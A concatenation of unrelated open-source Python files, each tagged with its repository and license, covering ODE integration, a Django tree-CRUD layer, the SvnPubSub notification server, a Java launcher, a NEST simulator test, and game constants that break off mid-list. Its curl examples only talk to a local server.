#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Example program integrating an IVP problem of van der Pol oscillator
"""
from __future__ import (absolute_import, division, print_function)
import numpy as np
from pygslodeiv2 import integrate_adaptive, integrate_predefined
def get_f_and_j(mu):
def f(t, y, dydt):
dydt[0] = y[1]
dydt[1] = -y[0] + mu*y[1]*(1 - y[0]**2)
def j(t, y, Jmat, dfdt):
Jmat[0, 0] = 0
Jmat[0, 1] = 1
Jmat[1, 0] = -1 - mu*2*y[1]*y[0]
Jmat[1, 1] = mu*(1 - y[0]**2)
dfdt[:] = 0
return f, j
def integrate_ivp(u0=1.0, v0=0.0, mu=1.0, tend=10.0, dt0=1e-8, nt=0,
t0=0.0, atol=1e-8, rtol=1e-8, plot=False, savefig='None',
method='bsimp', dpi=100, verbose=False):
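    """Integrate the van der Pol oscillator; nt > 1 selects output on a fixed
    time grid (integrate_predefined), otherwise adaptive output
    (integrate_adaptive). Optionally plots or saves the result."""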
f, j = get_f_and_j(mu)
if nt > 1:
tout = np.linspace(t0, tend, nt)
yout, info = integrate_predefined(
f, j, [u0, v0], tout, dt0, atol, rtol,
check_indexing=False, method=method)
else:
tout, yout, info = integrate_adaptive(
f, j, [u0, v0], t0, tend, dt0, atol, rtol,
check_indexing=False, method=method) # dfdt[:] also for len == 1
if verbose:
print(info)
if plot:
import matplotlib.pyplot as plt
plt.plot(tout, yout)
if savefig == 'None':
plt.show()
else:
plt.savefig(savefig, dpi=dpi)
if __name__ == '__main__':
try:
import argh
argh.dispatch_command(integrate_ivp)
except ImportError:
integrate_ivp()
| bjodah/pygslodeiv2 | examples/van_der_pol.py | Python | gpl-3.0 | 1,587 |
from .__about__ import __version__
from .portworx import PortworxCheck
__all__ = ['__version__', 'PortworxCheck']
| DataDog/integrations-extras | portworx/datadog_checks/portworx/__init__.py | Python | bsd-3-clause | 115 |
from django.template.defaultfilters import slugify
from ztree.models import Node
#from ztree.signals import tree_content_created, tree_content_updated
from ztree.utils import filter_and_clean_fields, dispatch_request_json
from ztreecrud.component.slugutils import SlugUtil
from akuna.component import get_component
from akuna.component.errors import ComponentDoesNotExist
import logging
logger = logging.getLogger('ztreecrud')
def create_node_factory(sender, **kwargs):
logger.debug('in node factory, kwargs: %s' % str(kwargs))
parent_node = kwargs.get('parent_node')
username = kwargs.get('username')
slug = kwargs.get('slug')
seq_num = kwargs.get('seq_num')
if not parent_node:
logger.debug('parent_node not set assuming site root')
parent_node = None
if not username:
#XXX how fatal is this, ok to proceed??
logger.error('username not set')
logger.debug('received slug: %s' % slug)
if not slug:
#XXX raise error 'slug' not set, serious problem
# rollback content creation
logger.error('slug could not be set')
return None
logger.debug('slug: ' + slug)
# create new node
node = Node(parent=parent_node, slug=slug, content_object=sender,
content_created_by=username, content_modified_by=username, seq_num=seq_num)
node.save()
logger.debug("node " + node.get_absolute_url() + " created")
return node
#XXX already have a node - so sender could be a node
#def update_node_factory(sender, **kwargs):
def update_node_factory(node, **kwargs):
logger.debug('in node factory')
username = kwargs.get('username')
if not username:
#XXX is this a fatal problem
logger.error('username not set')
logger.debug('updating node username - ' + username)
#node = sender.node
node.content_modified_by = username
node.save()
return node
class GenericCreateFactory(object):
def __call__(self, request, create_content_type, **kwargs):
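        """Create a content object of `create_content_type` and attach it to the tree.
        Uses a registered 'TreeContentCreateFactory' component when one exists for the
        content type, falling back to generic field filtering; returns the new Node."""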
logger.debug('creating obj of type: "%s"' % str(create_content_type))
create_content_type_name = create_content_type.app_label + '.' + create_content_type.model
try:
create_factory = get_component('TreeContentCreateFactory', name=create_content_type_name)
new_content_object = create_factory(request, create_content_type, **kwargs)
except ComponentDoesNotExist:
# generic content creation
filtered_data = filter_and_clean_fields(create_content_type, **kwargs)
model_class = create_content_type.model_class()
new_content_object = model_class(**filtered_data)
new_content_object.save()
## need to create tree node ##
# calc node slug
try:
slugutil = get_component('SlugUtil', name=create_content_type_name)
slug = slugutil.calc_slug(new_content_object, request, **kwargs)
except ComponentDoesNotExist:
# generic slug
slug = SlugUtil.calc_slug(new_content_object, request, **kwargs)
# node can also be ordered by seq_num
seq_num = kwargs.get('seq_num')
parent_node = request.tree_context.node
if hasattr(request, 'user'):
username = request.user.username
else:
# if serving backend tree web service, no auth and no request.user
username = kwargs.get('authenticated_username')
#XXX send signal creating node, do we need this, this possibly the only place
# node created, could invoke it directly
#tree_content_created.send(sender=new_content_object, parent_node=parent_node, username=username, slug=slug, seq_num=seq_num)
new_node = create_node_factory(new_content_object, parent_node=parent_node, username=username, slug=slug, seq_num=seq_num)
#logger.debug("object created")
#XXX is signal processing asynchronos, node might not be created,
# is it expensive referencing it here, do we need to return
# aNSwER: yes we need to check node created to rollback if it didn't
# or during node creating we need to raise some kind of exception which would
# trigger rollback
#return new_content_object.node
return new_node
class GenericUpdateFactory(object):
def __call__(self, request, content_object, **kwargs):
logger.debug('Updating object: "%s"' % str(content_object))
try:
# specific update factory component hook
update_factory = get_component('TreeContentUpdateFactory', (content_object,))
update_factory(request, content_object, **kwargs)
except ComponentDoesNotExist:
# generic content object update
filtered_data = filter_and_clean_fields(request.tree_context.node.content_type, **kwargs)
logger.debug("filtered_data: " + str(filtered_data) )
content_object.__dict__.update(**filtered_data)
content_object.save()
if hasattr(request, 'user'):
username = request.user.username
else:
# if serving backend tree web service, no auth and no request.user
username = kwargs.get('authenticated_username')
#XXX do we need to recalculate slug??
# probably not as it changes node absolute_path
# any cached urls to the page..
        #XXX send signal updated node; do we need this? This is possibly the only place
        # a node is updated, so we could invoke it directly
#tree_content_updated.send(sender=content_object, username=username)
updated_node = update_node_factory(content_object.node, username=username)
#return request.tree_context.node
return updated_node
class GenericDeleteFactory(object):
#XXX potential problem here where Generic rec not deleted and concrete deleted
# (or is it other way around)
def __call__(self, request, content_object, **kwargs):
logger.info('Deleting object: "%s"' % str(content_object))
try:
# specific delete factory component hook
delete_factory = get_component('TreeContentDeleteFactory', (content_object,))
delete_factory(request, content_object, **kwargs)
except ComponentDoesNotExist:
content_object.delete()
request.tree_context.node.delete()
return 1
import urllib
import urllib2
from django.conf import settings
from ztree.serializers import deserialize_node
class RemoteCreateFactory(object):
"""Remote TreeContent Content Factory - web service client.
Calls the web service 'content_factory' to create new `TreeContent` content object.
"""
def __call__(self, request, create_content_type, **kwargs):
content_type_name = create_content_type.app_label + '.' + create_content_type.model
submit_data = {'ct': content_type_name,
'authenticated_username': request.user.username,
#'slug': slug,
}
submit_data.update(kwargs)
if request.tree_context.node:
ws_create_content_uri = settings.ZTREE_WS_BASE_URL \
+ request.tree_context.node.absolute_path + '/create'
else:
ws_create_content_uri = settings.ZTREE_WS_BASE_URL + '/create'
resp = dispatch_request_json(ws_create_content_uri, method='POST', data=submit_data)
return deserialize_node(resp)
class RemoteUpdateFactory(object):
"""Web Service Update TreeContent Content Factory.
Calls the web service 'content_factory' to update `TreeContent` content object.
"""
#def __call__(self, node, update_data, username):
def __call__(self, request, content_object, **kwargs):
submit_data = {'authenticated_username': request.user.username}
submit_data.update(kwargs)
ws_update_content_uri = settings.ZTREE_WS_BASE_URL + request.tree_context.node.absolute_path + '/update'
resp = dispatch_request_json(ws_update_content_uri, method='POST', data=submit_data)
return deserialize_node(resp)
#from django.utils import simplejson
#from StringIO import StringIO
from rest_framework.compat import BytesIO
from rest_framework.parsers import JSONParser
class RemoteDeleteFactory(object):
"""Web Service Delete TreeContent Content Factory.
    Calls the web service 'content_factory' to delete `TreeContent` content object.
"""
#def __call__(self, node, username):
def __call__(self, request, content_object, **kwargs):
submit_data = {'authenticated_username': request.user.username}
ws_delete_content_uri = settings.ZTREE_WS_BASE_URL + request.tree_context.node.absolute_path + '/delete'
resp = dispatch_request_json(ws_delete_content_uri, method='POST', data=submit_data)
#resp_py = simplejson.load(StringIO(resp))
resp_py = JSONParser().parse( BytesIO(resp) )
if resp_py.get('status'):
return 1
return 0
| stana/django-ztree | ztreecrud/component/factories.py | Python | mit | 9,111 |
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# SvnPubSub - Simple Push Notification of Subversion commits
#
# Based on the theory behind the Live Journal Atom Streaming Service:
# <http://atom.services.livejournal.com/>
#
# Instead of using a complicated XMPP/AMQP/JMS/super messaging service,
# we have simple HTTP GETs and PUTs to get data in and out.
#
# Currently supports both XML and JSON serialization.
#
# Example Sub clients:
# curl -sN http://127.0.0.1:2069/commits
# curl -sN http://127.0.0.1:2069/commits/svn/*
# curl -sN http://127.0.0.1:2069/commits/svn
# curl -sN http://127.0.0.1:2069/commits/*/13f79535-47bb-0310-9956-ffa450edef68
# curl -sN http://127.0.0.1:2069/commits/svn/13f79535-47bb-0310-9956-ffa450edef68
#
# URL is built into 2 parts:
# /commits/${optional_type}/${optional_repository}
#
# If the type is included in the URL, you will only get commits of that type.
# The type can be * and then you will receive commits of any type.
#
# If the repository is included in the URL, you will only receive
# messages about that repository. The repository can be * and then you
# will receive messages about all repositories.
#
# Example Pub clients:
# curl -T revinfo.json -i http://127.0.0.1:2069/commits
#
# TODO:
# - Add Real access controls (not just 127.0.0.1)
# - Document PUT format
# - Convert to twisted.python.log
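#
# PUT format (illustrative sketch, inferred from the Commit class below --
# not an official spec): the request body is a JSON object whose top-level
# keys become Commit attributes. 'repository', 'type', 'format' and 'id'
# are required; other keys such as 'changed' (a list of paths) are passed
# through unchanged. For example:
#   {"repository": "13f79535-47bb-0310-9956-ffa450edef68",
#    "type": "svn", "format": "json", "id": 1234,
#    "changed": ["/trunk/README"]}
#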
try:
import simplejson as json
except ImportError:
import json
import sys
import twisted
from twisted.internet import reactor
from twisted.internet import defer
from twisted.web import server
from twisted.web import resource
from twisted.python import log
import time
class Commit:
def __init__(self, r):
self.__dict__.update(r)
if not self.check_value('repository'):
raise ValueError('Invalid Repository Value')
if not self.check_value('type'):
raise ValueError('Invalid Type Value')
if not self.check_value('format'):
raise ValueError('Invalid Format Value')
if not self.check_value('id'):
raise ValueError('Invalid ID Value')
def check_value(self, k):
return hasattr(self, k) and self.__dict__[k]
def render_commit(self):
obj = {'commit': {}}
obj['commit'].update(self.__dict__)
return json.dumps(obj)
def render_log(self):
try:
paths_changed = " %d paths changed" % len(self.changed)
except:
paths_changed = ""
return "%s:%s repo '%s' id '%s'%s" % (self.type,
self.format,
self.repository,
self.id,
paths_changed)
HEARTBEAT_TIME = 15
class Client(object):
def __init__(self, pubsub, r, type, repository):
self.pubsub = pubsub
r.notifyFinish().addErrback(self.finished)
self.r = r
self.type = type
self.repository = repository
self.alive = True
log.msg("OPEN: %s:%d (%d clients online)"% (r.getClientIP(), r.client.port, pubsub.cc()+1))
def finished(self, reason):
self.alive = False
log.msg("CLOSE: %s:%d (%d clients online)"% (self.r.getClientIP(), self.r.client.port, self.pubsub.cc()))
try:
self.pubsub.remove(self)
except ValueError:
pass
def interested_in(self, commit):
if self.type and self.type != commit.type:
return False
if self.repository and self.repository != commit.repository:
return False
return True
def notify(self, data):
self.write(data)
def start(self):
self.write_start()
reactor.callLater(HEARTBEAT_TIME, self.heartbeat, None)
def heartbeat(self, args):
if self.alive:
self.write_heartbeat()
reactor.callLater(HEARTBEAT_TIME, self.heartbeat, None)
def write_data(self, data):
self.write(data + "\n\0")
""" "Data must not be unicode" is what the interfaces.ITransport says... grr. """
def write(self, input):
self.r.write(str(input))
def write_start(self):
self.r.setHeader('X-SVNPubSub-Version', '1')
self.r.setHeader('content-type', 'application/vnd.apache.vc-notify+json')
self.write('{"svnpubsub": {"version": 1}}\n\0')
def write_heartbeat(self):
self.write(json.dumps({"stillalive": time.time()}) + "\n\0")
class SvnPubSub(resource.Resource):
isLeaf = True
clients = []
def cc(self):
return len(self.clients)
def remove(self, c):
self.clients.remove(c)
def render_GET(self, request):
log.msg("REQUEST: %s" % (request.uri))
request.setHeader('content-type', 'text/plain')
repository = None
type = None
uri = request.uri.split('/')
uri_len = len(uri)
if uri_len < 2 or uri_len > 4:
request.setResponseCode(400)
return "Invalid path\n"
if uri_len >= 3:
type = uri[2]
if uri_len == 4:
repository = uri[3]
# Convert wild card to None.
if type == '*':
type = None
if repository == '*':
repository = None
c = Client(self, request, type, repository)
self.clients.append(c)
c.start()
return twisted.web.server.NOT_DONE_YET
def notifyAll(self, commit):
data = commit.render_commit()
log.msg("COMMIT: %s (%d clients)" % (commit.render_log(), self.cc()))
for client in self.clients:
if client.interested_in(commit):
client.write_data(data)
def render_PUT(self, request):
request.setHeader('content-type', 'text/plain')
ip = request.getClientIP()
if ip != "127.0.0.1":
request.setResponseCode(401)
return "Access Denied"
input = request.content.read()
#import pdb;pdb.set_trace()
#print "input: %s" % (input)
try:
c = json.loads(input)
commit = Commit(c)
except ValueError as e:
request.setResponseCode(400)
log.msg("COMMIT: failed due to: %s" % str(e))
return str(e)
self.notifyAll(commit)
return "Ok"
def svnpubsub_server():
root = resource.Resource()
s = SvnPubSub()
root.putChild("commits", s)
return server.Site(root)
if __name__ == "__main__":
log.startLogging(sys.stdout)
# Port 2069 "HTTP Event Port", whatever, sounds good to me
reactor.listenTCP(2069, svnpubsub_server())
reactor.run()
| centic9/subversion-ppa | tools/server-side/svnpubsub/svnpubsub/server.py | Python | apache-2.0 | 7,427 |
#!/usr/bin/env python
#
# Wrapper script for Java Conda packages that ensures that the java runtime
# is invoked with the right options. Adapted from the bash script (http://stackoverflow.com/questions/59895/can-a-bash-script-tell-what-directory-its-stored-in/246128#246128).
#
# Program Parameters
#
import os
import subprocess
import sys
from os import access
from os import getenv
from os import X_OK
jar_file = 'SearchGUI-2.1.4.jar'
default_jvm_mem_opts = ['-Xms512m', '-Xmx1g']
# !!! End of parameter section. No user-serviceable code below this line !!!
def real_dirname(path):
"""Return the symlink-resolved, canonicalized directory-portion of path."""
return os.path.dirname(os.path.realpath(path))
def java_executable():
"""Return the executable name of the Java interpreter."""
java_home = getenv('JAVA_HOME')
java_bin = os.path.join('bin', 'java')
if java_home and access(os.path.join(java_home, java_bin), X_OK):
return os.path.join(java_home, java_bin)
else:
return 'java'
def jvm_opts(argv):
"""Construct list of Java arguments based on our argument list.
The argument list passed in argv must not include the script name.
    The return value is a 3-tuple of lists of strings of the form:
(memory_options, prop_options, passthrough_options)
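    For example (illustrative input, not from the original script),
    jvm_opts(['-Xmx2g', '-Dthreads=4', 'spectra.mgf']) returns
    (['-Xmx2g'], ['-Dthreads=4'], ['spectra.mgf']).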
"""
mem_opts = []
prop_opts = []
pass_args = []
for arg in argv:
if arg.startswith('-D'):
prop_opts.append(arg)
elif arg.startswith('-XX'):
prop_opts.append(arg)
elif arg.startswith('-Xm'):
mem_opts.append(arg)
else:
pass_args.append(arg)
# In the original shell script the test coded below read:
# if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ]
# To reproduce the behaviour of the above shell code fragment
    # it is important to explicitly check for equality with None
# in the second condition, so a null envar value counts as True!
if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
mem_opts = default_jvm_mem_opts
return (mem_opts, prop_opts, pass_args)
def main():
java = java_executable()
jar_dir = real_dirname(sys.argv[0])
(mem_opts, prop_opts, pass_args) = jvm_opts(sys.argv[1:])
if pass_args != [] and pass_args[0].startswith('eu'):
jar_arg = '-cp'
else:
jar_arg = '-jar'
jar_path = os.path.join(jar_dir, jar_file)
java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
sys.exit(subprocess.call(java_args))
if __name__ == '__main__':
main()
| zwanli/bioconda-recipes | recipes/searchgui/2.1.4/searchgui.py | Python | mit | 2,612 |
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Install and check status of BoringSSL + Chromium verifier."""
import os
import pathlib
import subprocess
from typing import Sequence
import pw_package.git_repo
import pw_package.package_manager
def boringssl_repo_path(path: pathlib.Path) -> pathlib.Path:
return path / 'src'
class BoringSSL(pw_package.package_manager.Package):
"""Install and check status of BoringSSL and chromium verifier."""
def __init__(self, *args, **kwargs):
super().__init__(*args, name='boringssl', **kwargs)
self._boringssl = pw_package.git_repo.GitRepo(
name='boringssl',
url=''.join([
'https://pigweed.googlesource.com',
'/third_party/boringssl/boringssl'
]),
commit='9f55d972854d0b34dae39c7cd3679d6ada3dfd5b')
def status(self, path: pathlib.Path) -> bool:
if not self._boringssl.status(boringssl_repo_path(path)):
return False
# Check that necessary build files are generated.
build_files = ['BUILD.generated.gni', 'err_data.c']
return all(os.path.exists(path / file) for file in build_files)
def install(self, path: pathlib.Path) -> None:
# Checkout the library
repo_path = boringssl_repo_path(path)
self._boringssl.install(repo_path)
# BoringSSL provides a src/util/generate_build_files.py script for
# generating build files. Call the script after checkout so that
# our .gn build script can pick them up.
script = repo_path / 'util' / 'generate_build_files.py'
if not os.path.exists(script):
raise FileNotFoundError('Fail to find generate_build_files.py')
subprocess.run(['python', script, 'gn'], cwd=path)
# TODO(zyecheng): Add install logic for chromium certificate verifier.
def info(self, path: pathlib.Path) -> Sequence[str]:
return (
f'{self.name} installed in: {path}',
'Enable by running "gn args out" and adding this line:',
f' dir_pw_third_party_boringssl = "{path}"',
)
pw_package.package_manager.register(BoringSSL)
| google/pigweed | pw_package/py/pw_package/packages/boringssl.py | Python | apache-2.0 | 2,720 |
# -*- coding: utf-8 -*-
"""
<DefineSource>
@Date : Fri Nov 14 13:20:38 2014 \n
@Author : Erwan Ledoux \n\n
</DefineSource>
A Concluder
"""
#<DefineAugmentation>
import ShareYourSystem as SYS
BaseModuleStr="ShareYourSystem.Standards.Objects.Conditioner"
DecorationModuleStr="ShareYourSystem.Standards.Classors.Tester"
SYS.setSubModule(globals())
#</DefineAugmentation>
#<ImportSpecificModules>
#</ImportSpecificModules>
#<DefineClass>
@DecorationClass()
class ConcluderClass(BaseClass):
#Definition
RepresentingKeyStrsList=[
'ConcludingTestVariable',
'ConcludingConditionTuplesList',
'ConcludingTypesList',
'ConcludedConditionIsBoolsList',
'ConcludedIsBool'
]
def default_init(self,
_ConcludingTestVariable=None,
_ConcludingConditionTuplesList=None,
_ConcludingTypesList=[type(len),type(type)],
_ConcludedConditionIsBoolsList=None,
_ConcludedIsBool=True,
**_KwargVariablesDict
):
#Call the parent init method
BaseClass.__init__(self,**_KwargVariablesDict)
def do_conclude(self):
""" """
#debug
'''
self.debug(('self.',self,['ConcludingConditionTuplesList']))
'''
#map condition
self.ConcludedConditionIsBoolsList=map(
lambda __ConcludingConditionTuple:
self.condition(
__ConcludingConditionTuple[0],
__ConcludingConditionTuple[1],
__ConcludingConditionTuple[2],
self.ConcludingTestVariable
).ConditionedIsBool,
self.ConcludingConditionTuplesList
)
#all
self.ConcludedIsBool=all(self.ConcludedConditionIsBoolsList)
#</DefineClass>
| Ledoux/ShareYourSystem | Pythonlogy/draft/Concluder/__init__.py | Python | mit | 1,598 |
from dream.core.tests.models import *
| alumarcu/dream-framework | dream/core/tests/__init__.py | Python | gpl-3.0 | 38 |
#!/usr/bin/env python3.2
#
# Copyright (c) Net24 Limited, Christchurch, New Zealand 2011-2012
# and Voyager Internet Ltd, New Zealand, 2012-2013
#
# This file is part of py-magcode-core.
#
# Py-magcode-core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Py-magcode-core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with py-magcode-core. If not, see <http://www.gnu.org/licenses/>.
#
"""
Zone instance copying using internal Python data structures. Mix-in class to modularise ZI classes.
"""
from magcode.core.globals_ import *
from magcode.core.database import *
from dms.dns import RRTYPE_A
from dms.dns import RRTYPE_AAAA
class ZiCopy(object):
"""
Contains methods for ZI copying via internal structures
"""
def copy(self, db_session, change_by=None):
"""
Copy ZI
First initialise base ZI, coppy comment structure set up,
then add records.
"""
ZoneInstance = sql_types['ZoneInstance']
RRComment = sql_types['RRComment']
# Keep previous change_by if it is not being changed. This is useful
# for auto PTR updates
if not change_by:
change_by = self.change_by
new_zi = ZoneInstance(zone_id=self.zone_id, soa_serial=self.soa_serial,
soa_mname=self.soa_mname, soa_rname=self.soa_rname,
soa_refresh=self.soa_refresh, soa_retry=self.soa_retry,
soa_expire=self.soa_expire, soa_minimum=self.soa_minimum,
soa_ttl=self.soa_ttl, zone_ttl=self.zone_ttl,
change_by=change_by)
db_session.add(new_zi)
new_zi.zone = self.zone
# Establish Apex comment, which is a special RR_Groups comment
# This dict establishes relN between new group comment and old one
        # by indexing the new comment against the old comment's id
rr_group_comments = {}
if self.apex_comment:
new_apex_comment = RRComment(comment=self.apex_comment.comment,
tag=self.apex_comment.tag)
db_session.add(new_apex_comment)
new_zi.apex_comment = new_apex_comment
rr_group_comments[self.apex_comment.id_] = new_apex_comment
# Establish rest of RR_Groups comments
for comment in self.rr_group_comments:
if self.apex_comment and comment is self.apex_comment:
# Apex comment is already done above here
continue
new_comment = RRComment(comment=comment.comment, tag=comment.tag)
db_session.add(new_comment)
rr_group_comments[comment.id_] = new_comment
# For the sake of making code clearer, do same for RR_Comments as
# for group comments
rr_comments = {}
for comment in self.rr_comments:
new_comment = RRComment(comment=comment.comment, tag=comment.tag)
db_session.add(new_comment)
rr_comments[comment.id_] = new_comment
# Walk zi RRs, and copy them as we go
for rr in self.rrs:
rr_type = sql_types[type(rr).__name__]
new_rr = rr_type(label=rr.label, domain=self.zone.name,
ttl=rr.ttl, zone_ttl=rr.zone_ttl,
rdata=rr.rdata, lock_ptr=rr.lock_ptr, disable=rr.disable,
track_reverse=rr.track_reverse)
db_session.add(new_rr)
new_zi.rrs.append(new_rr)
if rr_group_comments.get(rr.comment_group_id):
rr_group_comment = rr_group_comments[rr.comment_group_id]
new_rr.group_comment = rr_group_comment
# Uncomment if above is not 'taking'
# rr_group_comment.rr_group.append(new_rr)
if rr_comments.get(rr.comment_rr_id):
rr_comment = rr_comments[rr.comment_rr_id]
new_rr.rr_comment = rr_comment
# Uncomment if above is not 'taking'
# rr_comment.rr = new_rr
if hasattr(rr, 'reference') and rr.reference:
# Done this way as relationship is 'loose',
# SA relN is 'viewonly=True'
new_rr.ref_id = rr.ref_id
# Flush to DB to fill in record IDs
db_session.flush()
return new_zi
def get_auto_ptr_data(self, zone_sm):
"""
Return auto_ptr_data for the zi
"""
auto_ptr_data = []
zone_ref = zone_sm.reference
zone_ref_str = zone_ref.reference if zone_ref else None
for rr in self.rrs:
if rr.type_ not in (RRTYPE_A, RRTYPE_AAAA):
continue
# Use the dnspython rewritten rdata to make sure that IPv6
# addresses are uniquely written.
hostname = rr.label + '.' + zone_sm.name \
if rr.label != '@' else zone_sm.name
disable = rr.disable
auto_ptr_data.append({ 'address': rr.rdata,
'disable': disable,
'force_reverse': False,
'hostname': hostname,
'reference': zone_ref_str})
return auto_ptr_data
| onlinepcwizard/dms | dms/database/zi_copy.py | Python | gpl-3.0 | 5,748 |
# -*- coding: utf-8 -*-
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from . import test_delivery_auto_refresh
| OCA/carrier-delivery | delivery_auto_refresh/tests/__init__.py | Python | agpl-3.0 | 131 |
# -*- coding: utf-8 -*-
#
# test_disconnect.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
import nest
import unittest
import numpy as np
__author__ = 'naveau'
try:
from mpi4py import MPI
except ImportError:
# Test without MPI
mpi_test = 0
else:
# Test with MPI
mpi_test = 1
mpi_test = nest.sli_func("statusdict/have_mpi ::") & mpi_test
class TestDisconnectSingle(unittest.TestCase):
def setUp(self):
nest.ResetKernel()
nest.set_verbosity('M_ERROR')
self.num_procs = 1
if mpi_test:
self.comm = MPI.COMM_WORLD
self.rank = self.comm.Get_rank()
assert(nest.Rank() == self.rank)
self.num_procs = 2
self.exclude_synapse_model = [
'stdp_dopamine_synapse',
'stdp_dopamine_synapse_lbl',
'stdp_dopamine_synapse_hpc',
'stdp_dopamine_synapse_hpc_lbl',
'rate_connection_instantaneous',
'rate_connection_instantaneous_lbl',
'rate_connection_delayed',
'rate_connection_delayed_lbl',
'gap_junction',
'gap_junction_lbl',
'diffusion_connection',
'diffusion_connection_lbl',
]
def test_synapse_deletion_one_to_one_no_sp(self):
for syn_model in nest.Models('synapses'):
if syn_model not in self.exclude_synapse_model:
nest.ResetKernel()
print(syn_model)
nest.SetKernelStatus(
{
'resolution': 0.1,
'total_num_virtual_procs': self.num_procs
}
)
neurons = nest.Create('iaf_psc_alpha', 4)
syn_dict = {'model': syn_model}
nest.Connect([neurons[0]], [neurons[2]],
"one_to_one", syn_dict)
nest.Connect([neurons[1]], [neurons[3]],
"one_to_one", syn_dict)
# Delete existent connection
conns = nest.GetConnections(
[neurons[0]], [neurons[2]], syn_model)
if mpi_test:
conns = self.comm.allgather(conns)
conns = filter(None, conns)
assert len(list(conns)) == 1
nest.DisconnectOneToOne(neurons[0], neurons[2], syn_dict)
conns = nest.GetConnections(
[neurons[0]], [neurons[2]], syn_model)
if mpi_test:
conns = self.comm.allgather(conns)
conns = filter(None, conns)
assert len(list(conns)) == 0
                # Assert that one cannot delete a non-existent connection
conns1 = nest.GetConnections(
[neurons[0]], [neurons[1]], syn_model)
if mpi_test:
conns1 = self.comm.allgather(conns1)
conns1 = filter(None, conns1)
assert len(list(conns1)) == 0
try:
nest.DisconnectOneToOne(neurons[0], neurons[1], syn_dict)
assert False
except nest.NESTError:
print("Synapse deletion ok: " + syn_model)
def suite():
test_suite = unittest.makeSuite(TestDisconnectSingle, 'test')
return test_suite
if __name__ == '__main__':
unittest.main()
| apeyser/nest-simulator | pynest/nest/tests/test_sp/test_disconnect.py | Python | gpl-2.0 | 4,073 |
from __future__ import division, print_function, unicode_literals
from tech_const import *
screen_scale = 2
tile_names = ['floor', 'lava', 'wall', 'treasure', 'orc_weak', 'orc_strong', 'smoke',
'fly_weak', 'fly_strong']
hero_stat = ['health', 'int', 'exp']
heroes = ['wizard', 'priest', 'warrior', 'rogue']
ExpNeed = [0, 30, 70, 120, 180]
maxlvl = 5
exp_per_tile = 100
luck_per_tile = 40
lava_damage = 20
Tech_stat = {
'wizard': {'speed': 1, 'maxhp': 100, 'attack': 30, 'armor': 30},
'priest': {'speed': 1, 'maxhp': 100, 'attack': 30, 'armor': 30},
'warrior': {'speed': 1, 'maxhp': 140, 'attack': 30, 'armor': 30},
'rogue': {'speed': 2, 'maxhp': 80, 'attack': 30, 'armor': 30}
}
Artefacts = ['mage_wand', 'aqua_shield', 'bandit_sword',
'black_mask', 'crystal_dagger', 'frost_staff',
'glory_cloak', 'katana_sword', 'mage_hat',
'priest_robe', 'redking_amulet', 'redking_belt',
'redking_hat', 'rogue_knife', 'royal_ring',
'sharp_ring', 'speed_boots', 'holy_wand',
'redking_boots', 'flame_sword']
Skills = ['warrior_1', 'wizard_1', 'priest_1', 'rogue_1',
'rogue_2']
Wizard_skills = [('wizard_1', 0)]
Priest_skills = [('priest_1', 0)]
Warrior_skills = [('warrior_1', 0)]
Rogue_skills = [('rogue_1', 0), ('rogue_2', 1)]
Hero_skills = {'wizard': Wizard_skills, 'priest' : Priest_skills, 'warrior': Warrior_skills, 'rogue': Rogue_skills}
Traps = ['lava']
Monsters = ['orc', 'fly']
Magic = ['curse']
Walls = ['wall', 'floor']
Object_list = {'trap': Traps, 'monster': Monsters, 'magic': Magic, 'wall': Walls}
Cost_list = {'lava': 100, 'orc': 200, 'fly' :250, 'wall': 100, 'floor': 0,'curse': 500}
Moneyperturn = 200
starting_money = 1000
Art_wizard_1 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_2 = ['sharp_ring', 'holy_wand', 'royal_ring', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_1 = ['speed_boots', 'glory_cloak', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_2 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
